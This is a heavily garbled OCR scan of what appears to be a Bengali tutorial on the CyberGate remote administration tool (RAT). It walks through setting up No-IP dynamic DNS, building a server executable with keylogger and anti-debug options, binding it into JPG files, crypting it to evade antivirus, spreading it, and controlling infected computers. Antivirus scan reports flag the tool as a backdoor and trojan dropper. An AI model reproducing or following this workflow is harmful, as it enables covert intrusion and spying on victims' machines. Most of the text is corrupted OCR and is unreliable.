File size: 2162657 bytes


MD5 Hash: 951c614d223c4cf8b40cb42aecll4f46 


f*[^T feil^ ^fllfl Wy iibpvk) <T><qI<q v54<=HS 
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SHAl Hash: fa5c2ed8a3cd60aef0a976a45e2f50c02baa4516 
Detection rate: 0 on 9 (0%) 

Status: CLEAN 
Detections 


Avast -
AVG -
Avira AntiVir -
ClamAV -
Comodo -
Emsisoft -
F-Prot -
Ikarus -
TrendMicro -

Scan report generated by NoVirusThanks.org


.3 SIS PTWICT 3<Ih!| lAl^l <M«Si <KS Pi "I I ISIS 5 ll«1I ^T '3T S I®T “MM V vs ST'P'TS' ’IIISS I 

s) srftpr 
>) 'Siyrisw 
vs) (?rr& 


sn^pr a'a - sts - ^ sircar 1 |ts> <«r3?n srftpr srnts^r 6r nts - Ppvp sttiesm' sits' sits’T'T Pp^t vo i^* 1 jsts ^iiCis 5 

S^T I STPT SHST CTS I olWI'S 5T?T STl% ST SS®! '9ll t WIS ^ S’TS' Pits' & 'OISlClS 5 <PSW> ST^pT I SITS' Sp RnSS STTrSTS <PSW> FIS 

vs IS S^[ SI^USS pH ! 


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l 

: 

J 


<iil(H*j> 5i#< Mm- RAT f%? s*r?? R>«iw ? RailSa 

I 

: 

I 

FilPlF* ^|(<K 3F" VF FCF^ OJMb«HI <PFF RAT fat^ th31 FT <KF FHF (Ft FFFF JI?T (Flbl^fb R*l|«l Fv5" fbS®1 ^ OTvs ^KF 

I 

1 

I ^filfi oJTCF oTffF F(F fF(\3 Fit oj|'Siw j fi fi?^F t •'rfoivsfi fFFF fF(F I olrfF CfFTF ^fiR ’Jfjt CTCif 3l*HHJ I FFT TO" oJFT (FFF ^vs«uf <imifi 

| ^fiw«i FT I oITF F>FTO vsTfF oFTFTFTF (FFF Ff^sl WPpTFF SiFTt lbS®ilfi C^FST olFFT ofrfF Ff^t FfF’F' FT @ 


Intro 


| oTf% ^T#FT ofiFTF' M FT oTffF ?^F f^F oTflFTFFT ^ F^T fVCFfR ©oJIFKFF oTflFTST RAT oTIFTF' W FTCF FT^TFFf TO5F i)F FF CF(F^ 
vs'^SI ^ © RAT jf' <jf <jf ^ Remote Administration Tool I ™ frffvs ffivs cfft RAT ^ tiff tiffTt fff^fttf' w ftfot 
| FT ilFFfFF' F^FR^TF' (¥ 3F^t FTTF 3F^t tFF^F WT iFF^F FFTT FTF ! fWW FWvs'l FTFT\3 CFFf RAT 3F (SJTTO oRFF> (F% f%^ I f%oT(F 
| ^TPJF fFT^TFlt (FF F>fF © 


| ottfftft f% FFit TeamViewer / UltraVNC jsjtftf ftf tiftff ? ^sjjftf ftf FtFfSvs ? fft fttftf &t ojiff- ff^t stf w © 
TeamViewer, UltraVNC ^^jift twRAT fw <3^f Rfift RAT fffftiftto off s\ ff^t IxoSf ^f ftcf fftoff fftt f?t , cf&t (vs 

oTFFFFF F>FT FF fw FFt FF oT*pf% TO FT TOFT FTTWI fW oJTFFT (vsT FFlt FWPT ©\3lt oPTFT FTFTF IF fF(Ft oTTCFTFFT F^FF ©tftlFTF FT 
oltFF RAT 3F FFF%St FFTsT fFFTF \sTF CFF^ FTFF olTFF oTITO ^F (F^t I oJ|6Y(.4 oTRFT CF^IFlt fFWfFvs oJKFTSFT F^FF © 




RAT 3ip^r 3w ij^&r f^3T 3 w ? 

• ^lwii iW? ^|5>< ‘K'Sl'l “PS I 

p 

• St°T , \3TFF FFFT <t J C°5l c 1 v3 HFPT& TOFT 

• FltF FYIFWF^ - sj\3 , F^fF , (F 3 ^ , RPlb , aiS^ , oTTFCFT^ , FT^FTFTF tvsilR 

• (*TF <t J C°5l c 1 ~ v5F F^FT^ t^i" F^FT 

• PrfF tFFlFFF FFF 3TFFF , ^JTF , FFnFTFT^ tvsTlfF CTFTF F^FT 

• (slRiRS t^TWT oTTTW TO?TT | 

• FTv3FTF F^TF F^FT 

1 I 

tFfe FFTFF <£tW ^FT FTF FTFT RAT JF WsTF olfwift , 3TFF 3^TF f%F^F ilF f^F 3F ^FF olTFv3 \5FTFF ! 

I I 

I I 

1 I 

• FTTOFT^ ^Jfl FFT , Ca’Rbb FF^ >3F fvbCb'l ^Ifl F^FT 

• #Tpr^ OTTSTF FTFTfF | 

• Prf^ / RR)Rb FF FFF t^T ^3 FFT F^FTvs FKF ! 

• fFFT FFFTF \3 (.HlfbCF FR^T FFFF (F> (FfjSTWTfe' FFW FTCF >3F° \3 FFTvs FTCF 

• ilFTjST oTTF Fl^iTF FF^T F^FTvs FKF >34>bl RAT ! 


miwmmmm 



RAT Sffi CFH®T 3<MfK\2>'i oIK^ f%«TT ? 

i ^tFf% (F&T , RAT FTFTFFvs ^ FF^F , JF^T UDP , CF&Ras (FFF FFIFF (FFF (FT& FTFFas FF ^ [tftlFTF ^]TFT ] oJTF oRT&T TCP Sockets 
| UDP Sockets ftfftf f^f" fftoff ttff f^f" R1%f cfk6f ftfkf [ Ptftf yrr jffiff ] 


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(S (5 (5 (5 


I I I 


^TffsT 4v3^TT 

(oft" f% 1% oTTC^T f*lF& 


RAT ? 


t^fw \3 j4*m\3 Sr Remote Administration Tool 3?r 3^x vsTToW 


vblvbHC'I'lvb 


eFJT^ 434 ^oTPJT 


CiW 


DarkComet 

Poison Ivy 


I 431^ fwf4 W34 CyberGate I Cybergate vbi'S'HWivb 44 as ^ 4?p I 
3$T fafe^lM^Tfl 3 OTTOTT4 W ©TO - 3STW 4ft4P3 W 3 fa?T <£ 


3Sl4 (4T°T vb R(.fl^ vbl'5®iC c 1lvb 5 Tl$f% vTT^ oTfpT 


File Info

Report date: 2012-04-01 23:52:11 (GMT 1)
File name: cybergate-vl-07-5-zip
File size: 2389553 bytes
MD5 Hash: 7207dd93f9ac027059e7e4ef7d310686
SHA1 Hash: 75636952e912d6c889e31af7be98ec4610ecee54
Detection rate: 5 on 9 (56%)

Status: INFECTED

Detections

Avast -
AVG -
Avira AntiVir - BDS/Backdoor.Gen
ClamAV -
Comodo - Heur.Pck.EXECryptor
Emsisoft - Trojan-Dropper.Win32.Decay!IK
F-Prot - W 3 2/M a 1 w a re I -. G M Q Y
Ikarus - Trojan-Dropper.Win32.Decay
TrendMicro -

Scan report generated by NoVirusThanks.org

f IflOIlt (5W \5?T «TT ^3ST 'SJWIfl f^T 34 (34T 3413 4T ^PlPbvs) 9 iT4T^ 3K?M I ^ ftPb\S) «TT 9 H4T«T f^tl> 4[4 0r3T4 

I 

; ;] 'h'i'iFi S*«*i St otsf 4t4 far i 


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I R>»im RAT ihB-oiih ^?pt ? 

1 

| 

| otrr rr ^3 cwfRi RAT § ^rr ©\sr rPt jrr ow Cyber Gate m R&ifsi'vs ^ i \sr rrs 

1 ISSiw rrt RAT rt? rr t%R rr^> r/^r fV^>r IbStbilsHN i w*m TJ- Mir \3i?(.^si fV^r (bS®i Sr orr ^rt fw^ 

| x 

I I 

i" ■ 

I 

I Cyber Gate 

i 

I 

| Cyber Gate r$rr ^ri\s rrw ^vs^t fef*R rir vbiSwi'vb ^r i vbiSHRivb ^Ri\s r^rr 5^ ^ i 

I 

• No-IP Due 

• Winrar / Winzip 

f 

I 

SRr? ^PTT vblS^RIvb <K?I Pm I X TRT ^R R7l1%V3f§RR &[ C^R <Kfl Ih«1 

I a?T f%FR *fR 5JPTT ^HfM Sfl^T 


prt" ^r «tt rr®tr rtc^r PrPr oa i -R 



aaiat http://www.no-ip.com/ 3$ a rr f^F?r fter Rs rrr srrr rr Rfe^R aftRT ^ R?jR 


[Screenshot: No-IP home page (http://www.no-ip.com/)]


p r cro rrr rrr ( 2 jr Free DNS R?jR 

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Free DNS 


[Screenshot: No-IP plan comparison: Free DNS ($0 / year), Enhanced DNS ($14.95 / year), Plus Managed DNS ($24.95 / year)]


fttbfl fbCasi ^Tvd <k?I OtW 


[Screenshot: No-IP account sign-up form with Terms of Service]



^TFRR '9JuRj (\3 \3I?TC\!D ^JTRR >9J|'5Rj 4^ f*R 1 rW «#r c^tc^t :j tr 

oTT 5 RW 3h\3 5 1T 5 T\3?n^' <tRr 


'W 
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Forget your password? No problem, Click Here 



Login J 


afi^i totw ftcbfi fter^ ^3 Add a Host a 


[Screenshot: No-IP member area after login, with the Add a Host and Manage Hosts icons]




OT CTO \32rTC®T PiCbfl ^Rfl Ws <K£l S 


^TOT?r Try 9m b gt&t (vbic^'H 9mt ^ Create Host a 


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Hostname Information 

[Screenshot: No-IP "Add a Host" form: hostname, host type, IP address, Create Host button]


| 3RR otHfii No-IP DIC I Wbl vb| 5 «HC .°1 Ivb <K 3 I 3 RR ■ t oR c 1 bl(.<h $**113*1 <Kfl 'S'i c lR 'b'i'lR I 

| m v 3 m ^5 No-IP DIC chtsjw frr i s\^ http://www.no-ip.com/ gs tef?r 3 m3?n6 fw 

N i 




efsr Rcbfi ^Rfi asfor Select Host s\ 

| vdiR<m\^ awR i aSw arera" fer cao 


i a<hbf c^t& \3ia=r Rra®TR taR <^fii uiab Sr 


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Control Center 1 



[Screenshot: CyberGate Control Center menu]


| 3to r <m to s to to 100 ^ 
I RTRR 5 R sV H\3 (3TO fRT iR° (TO 


* TOR 3 I vs TOR TO 4TH4*M S\ <T ^^ITT (too ^ W TO 


[Screenshot: CyberGate "Select listening ports" dialog]


^trw control center j ^t?r Builder > Create Server j ^?p 


[Screenshot: CyberGate Control Center menu, Builder entry]




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Create Server S$06i v3W New 3 ^ w ^3 cwb fw 31 ^ 


[Screenshot: CyberGate "Create server" window, New User dialog]





^Ta tefW ^w\ f\s> Pu. 0 !^ Forward s\ PN> ^«r 


[Screenshot: CyberGate "Create server" window, Forward button]


5 rc^ Sw^i (\3 c 3 ^ DNS $ 2 n^' ®tt <3^t vdt Pk^ RRPib 


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Message j Keylagger , ^ Anti-Debug Create server' 


cybergate 

W\ Show password 


taffl <Pfll Wldb ! 100 pRjR PlCbfl ^Rfl <KSl 


Please enter connection address and port 



3rr Identification sa c-mc^tchi Rpfe Piw ttc?r ss^ m3?rpY ssa w$ m3?n£ Ppjr 


[Screenshot: CyberGate "Create server" window, Connection tab]


jrr Installation Syr Rcyi? Pitbfi ^Rfi sr fS^ Pi«i i Stsw ^Sr Random <nS®i s\ Sfii^j^r 

<K^<MR <Kfl Pr i 


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Create s 




[Screenshot: CyberGate "Create server" window, Installation tab]



3<rf?r Create Server Sin cw Ptirt ws ^ w Pr ^ Create server j 


[Screenshot: CyberGate "Create server" window, final tab with settings summary]



RAT oHb^rr (*r i 3 ^r Rt^fi Cs ,exe Sr Ro 


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n 

[Screenshot: Save dialog, file type Executables (.exe)]


3Sr fro *pr to 


<I|R> ^0:% W FT& ^TOTTfe 3TO FTO ^0:% frorfSx ■© 


| ^ toPt tof to ^tototo^ + tot to£ wf ^f'ohS 3 tofj^ tofto \ror crofcp^?nflk HfM>F Ft 

V3(5l v3?TTTOTOT 3TO fllSblfl TOTO TO^Ti^ TO?T S *JI<K C 1 C p llt- t ofl\3?nfS'“ hfWfl I F1TO|[ CTOfeWF^TOffe TOPTF t?T <l%\3 C 5 1l c 10K c 1 3TO ^vb>lvb TO* ^ifa 

| oW froft TO ft\s>K<l Flt-^flvS^lR-jN TOFCTOT | \3(<q ^ ^'i c l(h t FFFT 3<N?I (bS®1 <M<I 3 ^YT^TTC^" 


| 3FF FTf^fTOTfSc 3?T TOTTO I TOTTO 3TOTF F RAT TOW ST TOTOTOF (W TOT FTSTTTOT F v 3ST .exe 3?T ? FFTOTO ^Vlfavsltfl'I'H [ 

| CTT^ TO CTO>T ^V8G TO ©] v3SW FF TOTO W* TOTO ©\3lt TOTTO 3TOF TOTFfl feft TO^TO vsTC^ TO FTO F ^ WFt 
i ^iiPbvsi?fii>i 3 to toff sff <ro cto^i frocs tof i frorfSN totf TOtroiF 3 ^ tototo \3 Revs toctot i vstf vtof to^t 3to^ R^ii cttft cro* i 

p fiK^&FlRi f®TF ^ifa (<l*ll c 1 3<Pbl (bS®1 <HflR TO* s\ FF TO I <l c 1<l fTOTSF ftvsiF W ^(.fl I 

I 

I 3M TOR7F TO3 CTO TOTTO FTOF 3TO&T TOftF TO wt*F^SF 3?T TOoS FT fTO[ FfF W^TTgSF fTOF FFTT vslVlPS^'flTH £ pTT CTOTOT CTO TO , TOT 

CTO CTOffe I fTOTSF 3$ C3TTO 3?T TOtTOfit CTOfe 3FF TOF M¥T TOTOF F TOf%TO[tTOF 3F TOT TOW TOTTO TO TO \3t TOTtFSTCF .exe $ 

| ftCW FTO ®WTOT ? p H**'CF$ 3Sf ^VlPC'vs'l^'flTH (TO TOTfTO fTO f%CTO ^ff&F TO\3 TOF 


p 3^ F^TO TO TO CTOTOT 3^ST W^T 3^ ^TC^T TOTTO TOTO TOT^ ^TToF C^ ^ TO Fv3?n I p? 3^T TO 3^ oTTTOT ^aTW STCW^ 
| <rfe TO fWRT I 3TOT OTTTOT ^ TO&W f&f%TO 3^ ^TvsTfT Fo ftlTO W# vsTTO fTO 3&F 3^R®^TO TOF 3WC^TTO $ FTO 
.exe FTO ®TT ©TO 3ST ^STt TOfw^ft ^rr \3^ ^Tpr TOT feTO TO^M TOV3 : = 

I 

3?" 3^“ <l|?^)|fl ^llfl ^SlTOiT^r 3\s FT^T 3^“ ^TO" \3 3\s ^ITO F ®TMT <I%I^T\3 <^flCv3 FFF TO* oTF Ff*T 3 Fff^T ®TT F 

| fTOTF 3^ST W^T^T 3^FS TO TO^F TOTOTOT I oTTfF ^ S ST fe'FSTW ^TF 3TO&T TOt^TF 3^ vST^TOTO fTO fFF ^ 

I 

I 

| JPG+FileBinder [ 3Sr fiF JPG froro 3^ to to^ TO\s tototot ] 

I 

1 

p O-crypter 


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jsr R>«iw onft J&f fw ^rnsqg ? 


[ '5)15’K3 “Mlf! STITST sp <lMf>H<r> fSiP)>) (S(?rnT S'PTt'S «RTO S’ST 3 bC'3 ^ 


RFTF1F No-IP DNS m wrs^t srf a^K fPr wf ftcf 

FT\3TF tvslflfl FFF DNS ,3F\ FF FFpTF ilt% (FF fS<r>il<r> FTCF R^^CFTF HFTF ^>F \3 iP 
PtcfIf^ (Fit jf^ ft#tf >3f m3?nt <ff aFt ff 

RPTFTF FFFTF\3FTF (FF RTFFTCF FKFFFF <Pfl(.v3 FTFT FT (FF 


afFFT Sif arfFCR rf Ptf 2 


w w? ^ «w -;mffiwfiwi stw*m Cyber gate & turn w ®7W w/^ w ^ ?^is w / 


I -3)15’Kj <t>fiifi onw ’•njiPs srip? i pfBr Pi si's ?i 'MhP <hi < i 5 srrsrig <r>?i(.« fi^®t 

1 / 

| , RTF TjFFRT &T (FF F^F <3FX (F&TCF W FTFTF I 


Fpi (FTF fFp% Fife' (F RTRFRJ F>FTR FF RIF RW n^lfi F^F j 


| FfF FTFTF FfFFKF i)F\ fjJTFRF FTCF FT^F (F RTR^RJ FFCR FTF RWF CFPTYTF (FS\3FTF> ^TFTF FTFTFT fFF I -3ST RIFF fFFlfFR ,3FF?T fFFF I >3$ 
| fFfFW FFFvft (FFF (bS®i >3 RTpr CTFTF FFF fFRTCF fFl^TF fefF RTFRFF FFT ^TFT ^(vbtF RfbCF [ Spreading ] PlFF I 


| fFRKF ^FfF CF (Fvt RI^IQ FOT* ? 

I 

! 

| rtrftf cyber gate ^Smff St rrf fft ftfif cf^ rtrf$ fif ff°&f rtcf^ 3? S^rt cr rf rmf i rtf frrfftrtf rft Puff fP It 

| OFFTF F^F I 


[Screenshot: CyberGate main window listing connected computers]


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| OaT W i^TsT ? R>©IW ^7I&T3 i>8 frf W ? ^ 

! 

p rr ss St k_\3 fr cyber gate (sjr v»w ^r 3^Sr rt^S fw^ Rrf% sr (\sr RfRR rvd i fttbfi rIr Sr ot^r ^ 



[Screenshot: CyberGate context menu for a connected computer]


3$F!>T ! RR f%^ (\3l RTf% (R^ RCR !/ vsRSR \3 (3RR feTPRT Wf fRfifaR HR ‘FfjR (A3 I \57R «TTRT , i TM 5 T RRT , ^fMvDl 

stffR ^5" 2 n^®T I 


p wx - x 

| fRCR (bS «1 R^TR FR RR ^ fRRFF HTRR I RR ^ ^fl lb I HvFR 3RT RHW RRRR RTHRFF ©RRl 


R t% 


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